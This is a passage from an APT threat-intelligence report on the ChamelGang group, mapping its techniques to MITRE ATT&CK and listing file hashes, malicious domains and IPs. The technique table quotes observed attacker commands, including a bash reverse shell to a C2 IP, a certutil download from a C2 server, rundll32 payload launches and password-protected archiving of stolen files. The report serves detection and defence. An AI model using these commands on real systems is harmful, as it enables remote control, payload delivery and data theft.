The attackers used malicious programs that copy the names of system utilities to avoid detection. Examples: avp.exe, oci.dll, wlbsctrl.dll, modrpflt.dll, protsdown.dll |
T1055 |
Process Injection |
The attackers used malicious programs that inject malicious payload into system processes |
T1070 |
Indicator Removal on Host |
The attackers deleted the malware samples to avoid detection |
T1078.003 |
Local Accounts |
The attackers used compromised local administrator accounts to launch the malware with escalated privileges to move laterally within the compromised network |
T1140 |
Deobfuscate/Decode Files or Information |
The main malicious payload is encrypted with the AES algorithm |
T1218.011 |
Signed Binary Proxy Execution: Rundll32 |
The attackers used rundll32.exe to execute the payload, as well as the installer that loaded the DLL using rundll32. Example: C:\\Windows\\system32\\rundll32.exe\” C:\\Windows\\system32\\shell32.dll,OpenAs_RunDLL \\\\host\\c$\\windows\\web\\20210524115241_pffqscox.3b1; rundll32.exe ssd.dll,Regist c:\windows\web\ssd.en adminxadmin |
T1564.001 |
Hide Artifacts: Hidden Files and Directories |
The attackers created hidden files in Unix-like systems |
T1070.006 |
Indicator Removal on Host: Timestomp |
The attackers changed the time of creation of its malware and utilities in the file system by indicating an earlier period of time |
Discovery |
||
T1012 |
Query Registry |
The attackers used the reg utility to edit the Windows registry. Example: reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
T1016.001 |
System Network Configuration Discovery: Internet Connection Discovery |
The attackers used the curl utility to check the Internet connection and communicate with the C2 servers. Examples: curl -I -v https://*.*.*.* |
T1018 |
Remote System Discovery |
The attackers used the nslookup and ping utilities to conduct network reconnaissance. Examples: nslookup -type=ns victim.local *.*.*.*, ping -a -n 1 *.*.*.* |
T1049 |
System Network Connections Discovery |
The attackers used the netstat utility to check network connections. Examples: c:\\windows\\system32\\cmd.exe /c netstat -anop tcp \u003e c:\\windows\\temp\\_1622169989165 |
T1057 |
Process Discovery |
The attackers used the tasklist utility to obtain information about the processes |
T1069.001 |
Local Groups |
The attackers used the net group utility to detect users |
T1082 |
System Information Discovery |
The attackers used the ver and systeminfo utilities to conduct reconnaissance on the hosts |
T1087.001 |
Local Account |
The attackers used the net user and quser utilities to detect users |
Lateral Movement |
||
T1210 |
Exploitation of Remote Services |
The attackers exploited vulnerability MS17-010 (EternalBlue) to move laterally to other systems in the compromised network |
Collection |
||
T1560 |
Archive Collected Data |
The attackers ran a console command to create an archive of files of types interesting to them from user directories on the infected hosts. Examples: 7z.exe a -padminadmin -mhe=on -mx9 his.7z hist*. |
Command and Control (C2) |
||
T1071 |
Application Layer Protocol |
The attackers used the HTTPS Cobalt Strike Beacon, as well as a version with named channels |
T1090 |
Proxy |
The attackers used proxy servers inside the network. Examples: FRP, bash -i >& /dev/tcp/115.144.122.8/5555 0>&1. |
T1105 |
Ingress Tool Transfer |
The attackers downloaded additional utilities from the C2 server using the certutil utility. Examples: certutil -urlcache -f -split http://42.99.116[.]14/. |
T1572 |
Protocol Tunneling |
The attackers used network traffic tunneling tools. Examples: Neo-reGeorg |
Exfiltration |
||
T1041 |
Exfiltration Over C2 Channel |
The attackers uploaded the stolen files to the C2 servers |
IOCs
File indicators
File |
SHA-256 |
MD5 |
SHA-1 |
– |
6793e9299cab4cd07d4ddf35e03b32a05b0e965b3691d258ec2568402cf8d28f |
206e15f750f7fee32b110f5c79cf068b |
2e0d998775653135966ea7e3bdf1b7e90b5c6b0b |
– |
e8ee5b0d6b683407aa9cb091bf92273af0e287d4e7daa94ca93cd230e94df37a |
4e49adfed966f5d54cd1b89e1acb18ef |
683a38d352b4f5689b5395c955ba5f2cc77a2209 |
– |
d4e3747658e1a9e6587da411dc944597af95dd49b07126b8b090c7677ee30674 |
5d09c85b349d457471b18b598bb63e5d |
ab6a56ba3eb8f33e7373ffa3404c79f502873f98 |
.vim |
16b54dc11dbe2948467a10d68728811b03c12b12f7b29e53d0985fa07e29f9b7 |
cab9ecc235a0fe544e01dd6b30463f11 |
f65731c9a218d8a40c1804eaf22fdacd1dc83622 |
avp.exe |
ba867705eb986d1975abcf2f2b90ee2c7fdd09255076823cdd85c0feeea15a1b |
371a13ca89bf3b01346a8f7631a9be75 |
01536e40e3c5c1d5d742dd5f58b9b468ad788aa3 |
curlt.exe |
f1afce3be297fa6185903274b3b44cd263b4c1ea89e8282334bc5771c53af1c5 |
8550e586e7ae73863de0c5a6c11c5dc1 |
ce22e857eb05aae7fe0df52a9e0fb89fe9ef869a |
dlang.dat |
8e0e5ec7ed16e5fb1e8980a3ec6e3c5982fd8fa4cfc31428a6638950bbe5607a |
1a7f1012ea071e1b9955e502fab3023c |
e4a097b79a5a1f2a74af7599a6fb305c78d98f39 |
dlang.dat |
b9a231496682cd6bed978fb1b2b15986211e5c38a13cbb246de3dcf1d8db41f4 |
6a3c69384237078b6ab03ab7c38970ca |
0bf324fa87bab837e1c91d8022ad82dc33291a8e |
dlang.dat |
d831a87c6abd1bbb5a9ac9e1aac06a3d9b81b6e474bdc0c78e1908e26a6166b3 |
90cc1835823d5f86cd1947b03e6111a9 |
49e6775288bea7fdaff4b16bfd0f1608b0eb149e |
iis64.dll, iisfcgix64.dll, modrpflt.dll, httpsrfm64.dll |
538d423e3a8a884aac2d80b248d194388d3520cc508990da14c0a1384e7eddbd |
23f06ae1f9c78d2dc8f8d8b3cb3c5978 |
e21802dbd68416a324b84f62b56bb8af0bfa7035 |
modrpflt.dll |
73e9f7b9d22159f485b1c733981261ddc26fe7fcd104babfcc60369b354ccbe7 |
905aa9b9055592b585edb89eda236984 |
66ea9d5ef286c21dd96289c3943dcb376c3fc271 |
modrpflt.dll |
27b64e64b6787ad0682eac8aa42f9cd423518a92c4f6ce98596339363eeeebcc |
41cfb3db9837377e7f3a4a18d5b444e1 |
c7b1b348b8671b9440219843fc868f49beb7edef |
MpCmdRun.log.1 |
be147fe9110e32b4c4558900f63888756941bf0d0519dc25c075509457748c25 |
8dee79145aac1e5ffcd801ef07390fde |
8b2e5dcb9df689190f4e4662ad34badf5ad68a30 |
nfsd |
21d41a206cd12784473bec587a0b014b7cfd29c8da958531c773547402a16908 |
ea7d091e2d565f452b4735bc9ee966e6 |
d13e1462977dd8437797029bedcf6154c91abc43 |
o.r |
9dd08351c1094e29f279e66731bea55f546e534fdff8688b16b44b86f67df6cb |
4cb26fd5ca9bc238803e0971914039e2 |
26142e92c5a5a80d7a92d4372e46fc5bd8a1f8b9 |
oci.dll |
60758fd51c29c09b989be480107f36e7c5552e99a283588ad31c0f87a9353f69 |
cf0cc54e91b59ccafdc36a8f4b04f9c6 |
e2050319a08e9bd51eedc45e5660ac289b2052d9 |
oci.dll |
8f349ea483b4986b90384bcdde30666669303ede91f9261f40213bac9e44f286 |
cd4750c84f1a89f0db6c3d68a6530ad6 |
45e86bcd4cd48a55b8cbecd9b07dd1d61ea1d777 |
oci.dll |
9f0fc02c4cc5d77f28f3828a361afc93459c888acb1a186e874a60ead3c68ba6 |
6164f85c6273ea1bf7e2f051ceaacf31 |
8d9445f4d0057118a48f3c2503b4117194a4a255 |
oci.dll |
3b3d097873899e1a1d99c2ba5aedfc68b67f30acfeefc74e30eb02647729602f |
57eb643949a9a0fcd20dfe59af02c8d2 |
f8773ec1ec5bb3a241364ea5ac04b2b69fcdf2c5 |
ocilib.dll |
e18546ad747fa063285f24264f9dc3d452c9eb94dc7f1e87b5a8b0677bbf78d7 |
9c519480c8dd187222e32711a59c4d3c |
3dccb69365d07ec77cdf510186034d66c140eb35 |
old.awk |
21d41a206cd12784473bec587a0b014b7cfd29c8da958531c773547402a16908 |
ea7d091e2d565f452b4735bc9ee966e6 |
d13e1462977dd8437797029bedcf6154c91abc43 |
p.exe, proxyT.exe |
f1afce3be297fa6185903274b3b44cd263b4c1ea89e8282334bc5771c53af1c5 |
8550e586e7ae73863de0c5a6c11c5dc1 |
ce22e857eb05aae7fe0df52a9e0fb89fe9ef869a |
protsdown.dll |
be34984240e19e64eebcf7f31be9d1dee3defdefb7c9c5de77693527cfb89333 |
02da966d81c83867dbba69fba2954366 |
d50d21a249dbcb76c7cd0fdd18abaa9562f4b1d2 |
RunCheckConfig.class |
c6b0ea8e61dffe61737911cceafdf281c9e656e87365e9119184e4f42bd42c11 |
d3888adb6b71cb60e18c37ea16dbd502 |
fc40752cbafebd2a381f8e3b6a7d0396a7c49c17 |
siiHost.exe |
5c61d82b42c91c387d5ea6e245056b7a8aa213fcafe08c3a72e1866554931290 |
c18d3128042528e4a1ea9e34a9300bad |
18ac5d1bc6beb80e5c00cdc414dc2106661c1763 |
siihost.exe |
eb4a359c73c31e262e17a6bc2ccefa20429c3f5e2f6e9c521b9ad0ff96fd6ce0 |
8b8dc2f6fcb503092d57ec1857ddbddc |
2d5ebf4d8b7aff9f3c074aa0909cc3625ebade7a |
ssconf |
e3af2ef75033f3ececfd102ca116476397bac6244a8baafb1adebbe8d79c292e |
e4f785396fc10f0c200e0743cf75666c |
be7f2ab2e4893b242b612b3b3ee3aaf1d3aa2eda |
sshost.exe |
ba867705eb986d1975abcf2f2b90ee2c7fdd09255076823cdd85c0feeea15a1b |
371a13ca89bf3b01346a8f7631a9be75 |
01536e40e3c5c1d5d742dd5f58b9b468ad788aa3 |
tcs.jsp |
dbf16553507202fbd1aed5057df92d11b88563585ae9bcc517f584826fe4819d |
d19e9d9c648faeb92fd69b5bbf2e0c6e |
a130b48ecc23009b8ea5146ef43f8fa2e5e5a479 |
tunnel.jsp |
8491a786a3a00549f35302160c70e6b8cca6e9792be82e0092e7444850ebdfe9 |
6dace1bf8d7d3b8b1d21a5a32217406d |
8da1597cb34547dc23387e6b6f49fda2179317c5 |
wl |
23403a06e470420b8f02d3c352f08446146920412d02444771b42c561d69ba83 |
81ab2303c56b563c106ec0f454b5da83 |
11baf308948fcd058a7b1b9a2dfb6a18f9dba635 |
wl.dll |
132688d482129c3935577e73de15f4cc5f382bd511c249d19adbb78b9f1d16c3 |
42f1215a4d6261c2d5ee28eecb60bc1c |
0f452c0ce26b848a6340665416cc25690828969b |
wlbsctrl.dll |
373974f2e7933ec8b6eb7afbc98d2d4e0cfc348321864aaf1bbaf66d4d9ef83b |
5fb9ea9b063548193bbebc3f8f2b193c |
c2d30cf0a337b945122673e3d75c94ffac14fefe |
wlbsctrl.dll |
4b9701472ab1aabe7ea5a15146d21a9ebff60fe8077efb013d54969ff2b67b39 |
b701f60803dc1e240cae8e48cb9582ef |
cec5bad309286b08d306758b02538ce0e4021a3d |
Network indicators
softupdate-online.top |
internet.softupdate-online.top |
update.softupdate-online.top |
download.softupdate-online.top |
online.softupdate-online.top |
downloads.softupdate-online.top |
mcafee-service.us.com |
cn.mcafee-service.us.com |
en.mcafee-service.us.com |
www.mcafee-service.us.com |
mcafee-upgrade.com |
tw.mcafee-upgrade.com |
www.mcafee-upgrade.com |
ssl.mcafee-upgrade.com |
test.mcafee-upgrade.com |
us.mcafee-upgrade.com |
microsoft-support.net |
www.microsoft-support.net |
os.microsoft-support.net |
docs.microsoft-support.net |
tstartel.org |
app.tstartel.org |
mail.tstartel.org |
www.tstartel.org |
webmail.tstartel.org |
newtrendmicro.com |
auth.newtrendmicro.com |
upgrade.newtrendmicro.com |
contents.newtrendmicro.com |
content.newtrendmicro.com |
www.newtrendmicro.com |
market.newtrendmicro.com |
centralgoogle.com |
app.centralgoogle.com |
derbox.centralgoogle.com |
content.centralgoogle.com |
collector.centralgoogle.com |
ibmlotus.net |
appupdate.ibmlotus.net |
www.ibmlotus.net |
mail.ibmlotus.net |
helpdisk.ibmlotus.net |
upgrade.ibmlotus.net |
search.ibmlotus.net |
microsofed.com |
api.microsofed.com |
cdn-chrome.com |
login.cdn-chrome.com |
funding-exchange.org |
snn1.mhysl.org |
snn2.mhysl.org |
snn3.mhysl.org |
static.mhysl.org |
kaspernsky.com |
update.kaspernsky.com |
103.151.228.119 |
103.80.134.159 |
115.144.122.8 |
172.104.109.12 |
42.99.116.14 |
45.91.24.73 |
91.204.227.130 |
原文始发于ptsecurity:Masters of Mimicry: new APT group ChamelGang and its arsenal
转载请注明:Masters of Mimicry: new APT group ChamelGang and its arsenal | CTF导航